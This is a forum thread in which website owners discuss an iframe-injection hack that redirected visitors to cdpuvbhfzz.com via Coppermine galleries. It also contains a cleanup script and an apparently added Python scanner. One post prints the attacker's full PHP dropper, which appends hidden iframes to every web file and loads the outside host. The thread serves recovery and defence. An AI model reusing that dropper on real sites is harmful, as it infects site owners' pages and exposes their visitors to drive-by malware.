cdpuvbhfzz.com
truespeed
Has anyone else's site been hacked with a redirect to this site, "cdpuvbhfzz.com"? I have Googled it and it seems to have happened to a lot of sites, attacking mainly forums and galleries; they have also managed to attack WordPress blogs.

All my files, including the forum and gallery, were affected; even my stand-alone HTML pages were modified.

It plants an iframe in every PHP and HTML file at the bottom of the page.
tijn01
Yeah, that really sucks, man. I hope you figure out how to solve it. It hasn't happened to me yet, thank god for that!!
Good luck
Vrythramax
I am sorry for your hardship, but have you found any way around this?
truespeed
Vrythramax wrote:
I am sorry for your hardship, but have you found any way around this?


No, not really. From what I have read on the web, all you can do is either go into every file individually and remove the iframe, which when you have scripts means you have a lot of files to edit, or just delete the files and upload the software files again, which is what I have done. Luckily the databases weren't affected, as I didn't have those backed up.
Liu
Was this on the Frihost server? If so, then potentially all our websites may be at risk of being compromised.
truespeed
Liu wrote:
Was this on the Frihost server? If so, then potentially all our websites may be at risk of being compromised.


No, it wasn't on Frihost, and I have looked on my host's forum, and so far nobody else seems to have been affected, so I'm not really sure how they are doing this, as it has happened to too many people. I have other sites on the same server and none of these were affected, so it's all a bit of a mystery as to how they are doing it.
Liu
There may be a vulnerability in the application creation process itself then, i.e. WordPress and the apps used to create the galleries. The user forms that are directly handling database transactions, are they properly handling escape characters? If not, this could be a potential SQL injection attack, where one can easily get your credentials.
rvec
I am guessing the iframes are all the same; couldn't you just have used a search and replace?
In Notepad++ you can search in all opened files (just open all affected files) and replace all the stuff with a space.
truespeed
rvec wrote:
I am guessing the iframes are all the same; couldn't you just have used a search and replace?
In Notepad++ you can search in all opened files (just open all affected files) and replace all the stuff with a space.


I don't really know what you mean, or how I would do that. Anyway, it's too late, as I deleted the files.

I'm stuck at the moment, as I thought just re-uploading the files again and putting the database info into the config files would work. Well, it did with the phpBB forum, but I'm having problems with the Coppermine gallery.

Hopefully I will be able to work it out, as hundreds of hours of work went into the gallery, with over 7000 pictures that were uploaded into categories and named.

EDIT: I think I may have the wrong Coppermine version, as I have just noticed they did a security update in February. I'm hoping that's it, as I think I have the version I used on another PC.
missdixy
Wow, that sounds nasty :/ I'd never heard of that before.
Ghost Rider103
Do you have a forum at your website? If you do, make sure you only have one default skin through the template. As far as I know it is very possible to hack in from there, but by using only one default skin for the forum, it is much harder to do.

That sucks about what happened; hopefully it doesn't happen again.
truespeed
Ghost Rider103 wrote:
Do you have a forum at your website? If you do, make sure you only have one default skin through the template. As far as I know it is very possible to hack in from there, but by using only one default skin for the forum, it is much harder to do.

That sucks about what happened; hopefully it doesn't happen again.


Yeah, I do have a forum, and yes, I have a default skin. I'm back online with the forum and have had no other attacks so far, but if they can gain entry once I know it's a possibility that they can do it again. With the forum, I am fully backed up though.
jmlworld
I know the cause of that weird redirection. A hidden VIRUS on your computer (not the host server) edits all the files ending in .html, .php, .asp, and all web programming extension files. The reason that virus edits those files is that when you upload your files to a SERVER (and then install it over there if required), the code redirects the whole website (or loads the page inside the iframe, which is really invisible because of the height and width, which the virus sets to a tiny value like height = 1px, width = 1px). Whether the code redirects the whole page or part of it to cdpuvbhfzz.com, the purpose of the redirection is to trick not only you but even the visitors of your site, because cdpuvbhfzz.com may be a scam page or virus-ridden, which will make further stealth downloads of trojans and worms; also cdpuvbhfzz.com may be involved with fraud and something like that, just tricky.

A site like this one existed in 2006, called krvkr.com, which even had the ability to write malicious code into an audio file like RealPlayer's .ram files; however, it looks as if it has expired or been terminated these days.

Why not scan your whole PC, and if you already did, just switch your anti-virus program to another one or update it to the latest version.
Ghost Rider103
truespeed wrote:
Ghost Rider103 wrote:
Do you have a forum at your website? If you do, make sure you only have one default skin through the template. As far as I know it is very possible to hack in from there, but by using only one default skin for the forum, it is much harder to do.

That sucks about what happened; hopefully it doesn't happen again.


Yeah, I do have a forum, and yes, I have a default skin. I'm back online with the forum and have had no other attacks so far, but if they can gain entry once I know it's a possibility that they can do it again. With the forum, I am fully backed up though.


Well, of course you have a default skin, but do you give users the option to change that default skin to another? If so, that is probably where they are getting in.
mentalist3d
Hi all

Just saw your posts and thought I would join the forum, as I have been affected by this nuisance as well; however, I am running Coppermine gallery and not any forum scripts.

You can get more information about the hack attack (coppermine specific) at: http://forum.coppermine-gallery.net/index.php/topic,51671.msg250825.html#msg250825

Check your hosting logs and you will probably see the time of the attack. For Coppermine they were using the URI image upload function to exploit a weakness. Within our server I found a file, 142739_298w3.zip, which is actually a PHP file which seems to be changing folder permissions and attaching the iframe code to all your pages. Look for this file and remove it, and disable user registrations etc. for now.

Below is a script someone created to remove the extra lines of code from your site (this worked for a few people running Coppermine, including myself). You may need it modified to work with the forum; it will remove the affected code, but the creator of the file (j_taubman) cannot guarantee that there won't be any additional problems later.

killorcure.php

Code:
<?php
// killorcure.php: strips the injected iframe line from the end of every
// .php/.html/.htm file below the document root. Upload it, browse to it once,
// then delete it. Edit the marker if the injected iframe points elsewhere.
define('INJECTED_MARKER', 'cdpuvbhfzz.com');

function fileExtension($file) {
    $fileExp = explode('.', $file);
    return strtolower($fileExp[count($fileExp) - 1]);
}

// Cleans the web files directly inside $path and returns its sub-directories.
function parse($path) {
    $dir_array = array();
    // Normalise the trailing slash before building child paths. The original
    // only added it after the first plain file was seen, so directories listed
    // before that (e.g. directly under DOCUMENT_ROOT) were tested as
    // "/var/wwwname" and silently skipped.
    if (substr($path, -1) != '/') {
        $path .= '/';
    }
    if ($handle = opendir($path)) {
        while (false !== ($file = readdir($handle))) {
            if ($file == "." || $file == "..") {
                continue;
            }
            $full = $path . $file;
            if (is_dir($full)) {
                array_push($dir_array, $full . '/');
            } else {
                $f_ext = fileExtension($file);
                if ($f_ext == "php" || $f_ext == "html" || $f_ext == "htm") {
                    // Leave debugger.inc.php and this cleaner itself alone.
                    if ($file != "debugger.inc.php" && realpath($full) != realpath(__FILE__)) {
                        cutline($full);
                    }
                }
            }
        }
        closedir($handle);
    }
    return $dir_array;
}

// Breadth-first walk of the document root: $dirs is a queue, $total/$last
// mark the slice of it that belongs to the current depth level.
function launch() {
    $total = 0;
    $last = 1;
    $last_num = 0;
    $path = $_SERVER['DOCUMENT_ROOT'];
    $dirs = array();
    array_push($dirs, $path);

    while ($last) {
        $last_num = 0;
        for ($j = $total; $j < $total + $last; $j++) {
            $temp_dirs = parse($dirs[$j]);
            $last_t = sizeof($temp_dirs);
            $last_num += $last_t;
            for ($i = 0; $i < $last_t; $i++) {
                array_push($dirs, $temp_dirs[$i]);
            }
        }
        $total += $last;
        $last = $last_num;
    }
}

// Removes line $line_no (1-based, -1 = last line) from $filename, but only
// when that line contains INJECTED_MARKER, so clean files are never truncated.
// Caveat: the dropper appends without a newline, so if a file had no trailing
// newline the iframe sits on the same line as the last real line of code and
// that whole line is dropped; review such files afterwards.
function cutline($filename, $line_no = -1) {
    $strip_return = FALSE;
    $data = file($filename);
    if ($data === FALSE || count($data) == 0) {
        return FALSE;
    }
    $size = count($data);
    $skip = ($line_no == -1) ? $size - 1 : $line_no - 1;

    if ($skip < 0 || $skip >= $size || strpos($data[$skip], INJECTED_MARKER) === FALSE) {
        return FALSE;   // nothing injected on that line, leave the file untouched
    }
    $pipe = fopen($filename, 'w');
    if ($pipe === FALSE) {
        return FALSE;   // not writable; the file still needs cleaning by hand
    }
    for ($line = 0; $line < $size; $line++) {
        if ($line != $skip) {
            fputs($pipe, $data[$line]);
        } else {
            $strip_return = TRUE;
        }
    }
    fclose($pipe);
    return $strip_return;
}

echo "~!";
launch();
?>


Upload the file to the server and run it only once. Try and get someone to check the script here before using it, just to make sure it is compatible.

Hope this helps
jmlworld
mentalist3d wrote:
Hi all

Just saw your posts and thought I would join the forum, as I have been affected by this nuisance as well; however, I am running Coppermine gallery and not any forum scripts.


Though this weird thing didn't attack me, I'm very happy with your kind contribution, man. I commented about this THREE POSTS above this reply, because I've experienced some behaviours similar to this redirection which occurred inside my localhost, which affected even the phpMyAdmin files and Joomla, WordPress and my own projects.

It looks as if the writers of that thing used a double brain to attack certain scripts like Coppermine online. However, my question is how "142739_298w3.zip" managed to upload itself onto a web server?! I think it went over there along with user-submitted files.

Will someone test killorcure.php, please, so it will help more of us and protect against further hacks?

For mentalist3d, could you please make a simple description of how "killorcure.php" will remove the weird code, please?
mentalist3d
Hi JMLworld

The script removes the iframe code that was added to the bottom of every .php and .html page. I uploaded it to my server and then browsed to the page; you get a blank screen. After that I navigated back to my main page and the site was back to normal. I checked the code of several pages and the code was back to its normal state. The script seems to look for the specific iframe code that was placed on the bottom of the pages and strip it out.

When the hacker got in with the zip file they seem to have uploaded a couple of images as well. The zip file is actually a disguised PHP script; changing the file extension from .zip to .php gives you this code:

Code:
<?php
function fileExtension($file) {
    $fileExp = explode('.', $file);
    $filetype = $fileExp[count($fileExp)-1];
   
   return $filetype;
}

function parse($path) {
   $dir_array = array();
   if ($handle = opendir($path)) {
      while (false !== ($file = readdir($handle))) {
         if ($file != "." && $file != "..") {
            $try_dir = $path.$file.'/';
            if(is_dir($try_dir)) {
               array_push($dir_array, $try_dir);
            }
            else {
               if ($path[strlen($path)-1] != '/') {
                  $path.= '/';
               }
               $f_ext = fileExtension($file);
               if($f_ext=="php" || $f_ext=="html" || $f_ext=="htm") {
                  if($file!="debugger.inc.php") {
                     //chmod($path.$file,0777);
                     $fhandle = fopen($path.$file, 'a+');
                     if($f_ext=="php") {
                        fwrite($fhandle, "<?php echo '<iframe src=\"http://cdpuvbhfzz.com/dl/adv598.php\" width=1 height=1></iframe>'; ?>");
                     }
                     else {
                        fwrite($fhandle, "<iframe src=\"http://cdpuvbhfzz.com/dl/adv598.php\" width=1 height=1></iframe>");
                     }
                     fclose($fhandle);
                  }
               }
            }
         }
      }
      closedir($handle);
   }
      
   return $dir_array;
}

function launch() {
   $total = 0;
   $last = 1;
   $last_num = 0;
   $path = $_SERVER['DOCUMENT_ROOT'];
   $dirs = array();
   array_push($dirs, $path);
   
   while($last) {
      $last_num = 0;
      for( $j=$total; $j<$total+$last; $j++) {
         $temp_dirs = parse($dirs[$j]);
         $last_t = sizeof($temp_dirs);
         $last_num += $last_t;
         for( $i=0; $i<$last_t; $i++) {
            array_push($dirs, $temp_dirs[$i]);
         }
      }
      $total += $last;
      $last = $last_num;      
   }
   $paths = $_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'];
   unlink($paths);
   
   if (is_file($paths)) {
      $fhandle = fopen($paths, 'w');
      fwrite($fhandle, "<?php echo'Upload plugins here'; ?>");
      fclose($fhandle);
   }
}

if (isset($_GET['ff']))
{
echo "~!";
launch();
}
echo '<iframe src=\"http://cdpuvbhfzz.com/dl/adv598.php\" width=1 height=1></iframe>';
?>


The script seems to change your chmod values so everything is writable and then adds the iframe code to your pages. They got it onto my server by repeatedly registering accounts until one of the registrations was successful; they then uploaded the zip file, which my gallery formerly allowed, and well, my site got completely changed.
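The two indicators described in this thread can be checked for across a whole web root (or a backup of it) before and after running a cleaner: the 1x1 iframe appended to .php/.html/.htm files, and files with a passive extension (the .zip that was really PHP, or the .jpg later mentioned in the userpics folder) that contain PHP source. The scanner below is an added example written for this thread, not code posted by any of the participants or by the Coppermine project. The sample web root it builds is constructed in a temp directory; the iframe host and the file names are the ones quoted above, and the .zip body is a placeholder comment rather than the real dropper.

```python
import os
import re
import tempfile

# Hosts seen in the injected iframes in this thread. Extend the tuple for other campaigns.
INJECTED_HOSTS = ("cdpuvbhfzz.com",)

# Extensions the dropper appends the iframe to.
WEB_EXTS = {".php", ".html", ".htm"}

# Extensions that should never contain PHP source. A "<?php" tag inside one of
# these is the disguised-upload pattern (the .zip that was really PHP, and the
# later variant that drops a .jpg and points the header include at it).
PASSIVE_EXTS = {".zip", ".jpg", ".jpeg", ".gif", ".png", ".txt"}

# Any iframe tag with an absolute http(s) src; the host is captured separately.
IFRAME_RE = re.compile(
    r'<iframe\s[^>]*?src=["\']https?://(?P<host>[^/"\'\s]+)[^"\']*["\'][^>]*>',
    re.IGNORECASE,
)
DIM_RE = re.compile(r'\b(width|height)=["\']?(\d+)', re.IGNORECASE)


def is_one_by_one(tag):
    """True when an iframe tag declares width=1 and height=1 (the hidden form)."""
    dims = {k.lower(): v for k, v in DIM_RE.findall(tag)}
    return dims.get("width") == "1" and dims.get("height") == "1"


def classify_file(path, data):
    """Return a list of (finding, detail) tuples for one file's raw bytes."""
    findings = []
    ext = os.path.splitext(path)[1].lower()
    text = data.decode("latin-1")  # byte-preserving; we only look for ASCII markers
    if ext in WEB_EXTS:
        for m in IFRAME_RE.finditer(text):
            host = m.group("host").lower()
            if host in INJECTED_HOSTS:
                findings.append(("injected_iframe", host))
            elif is_one_by_one(m.group(0)):
                findings.append(("hidden_iframe", host))
    elif ext in PASSIVE_EXTS and "<?php" in text.lower():
        findings.append(("php_in_passive_file", ext))
    return findings


def scan_tree(root):
    """Walk a web root and map relative path -> findings for every suspicious file."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                with open(full, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            findings = classify_file(full, data)
            if findings:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                results[rel] = findings
    return results


# Constructed sample web root (not real site data): two clean files, two files
# with the appended iframe, a benign visible iframe, and two disguised uploads.
SAMPLE_FILES = {
    "index.php": b"<?php echo 'Welcome'; ?>\n",
    "images/logo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
    "forum/viewtopic.php": (
        b"<?php echo 'topic'; ?>\n"
        b"<?php echo '<iframe src=\"http://cdpuvbhfzz.com/dl/adv598.php\" "
        b"width=1 height=1></iframe>'; ?>"
    ),
    "gallery/about.html": (
        b"<html><body>About</body></html>\n"
        b"<iframe src=\"http://cdpuvbhfzz.com/dl/adv598.php\" width=1 height=1></iframe>"
    ),
    "embed.html": b'<iframe src="https://www.youtube.com/embed/x" width="560" height="315"></iframe>\n',
    "albums/userpics/10001/142739_298w3.zip": b"<?php /* placeholder for the dropper body */ ?>",
    "albums/userpics/10001/header.jpg": b"<?php echo 'not an image'; ?>",
}


def build_sample_root():
    """Write SAMPLE_FILES into a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot_")
    for rel, content in SAMPLE_FILES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, findings in sorted(scan_tree(build_sample_root()).items()):
        print(rel, findings)
```

Point `scan_tree` at the real document root (or at the backup you are about to restore) and an empty result is the confirmation that a cleaner such as killorcure.php actually reached every file; a `php_in_passive_file` hit inside an upload directory is the dropper or its successor and belongs in the hosting-log timeline mentioned earlier in the thread.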
nivinjoy
Is it happening now also...?? Any information on that..??
truespeed
First of all, I managed to get my gallery back up and running and updated to the latest version. In my haste to sort it out, I missed something as obvious as the updated Coppermine prefix being different to my own.

jmlworld wrote:
I know the cause of that weird redirection. A hidden VIRUS on your computer (not the host server) edits all the files ending in .html, .php, .asp, and all web programming extension files. The reason that virus edits those files is that when you upload your files to a SERVER (and then install it over there if required), the code redirects the whole website (or loads the page inside the iframe, which is really invisible because of the height and width, which the virus sets to a tiny value like height = 1px, width = 1px). Whether the code redirects the whole page or part of it to cdpuvbhfzz.com, the purpose of the redirection is to trick not only you but even the visitors of your site, because cdpuvbhfzz.com may be a scam page or virus-ridden, which will make further stealth downloads of trojans and worms; also cdpuvbhfzz.com may be involved with fraud and something like that, just tricky.

A site like this one existed in 2006, called krvkr.com, which even had the ability to write malicious code into an audio file like RealPlayer's .ram files; however, it looks as if it has expired or been terminated these days.

Why not scan your whole PC, and if you already did, just switch your anti-virus program to another one or update it to the latest version.


I don't think it's come from my PC, although I could be wrong, mainly because there are no infected HTML or PHP files on my PC; all the files were on my server.

mentalist3d wrote:
142739_298w3.zip


Thanks for pointing this out. I found this in the folder you said it would be in; I never would have looked in there.
jmlworld
Mentalist3d,

Thanks, as I understood from the code, it's seek and replace; if I'm not wrong, the code searches for and replaces the iframe.

TrueSpeed,

Hackers behave differently; they may attack even secure servers. But I'm sure I had such an attack on my localhost one year ago.
truespeed
They have just done my site again. For those with Coppermine galleries, they have just done an update release, so I would advise anyone who has one to do the update as soon as possible.
Liu
Exactly -- fix the vulnerability first (updates) before actually trying to remove the inserted iframes. What's the use if you can't fix the root problem at hand?
truespeed
Liu wrote:
Exactly -- fix the vulnerability first (updates) before actually trying to remove the inserted iframes. What's the use if you can't fix the root problem at hand?


The update was only released yesterday. The problem with Coppermine, unlike phpBB, which tells you in your admin page when an update is released, is that unless you visit the site daily there is no way of knowing if an update is available.

Update on the cdpuvbhfzz.com hack.

It now plants a jpg file in the userpics/10001 folder and sets the "Path to custom header include" to it in the gallery config.
© 2005-2011 Frihost, forums powered by phpBB.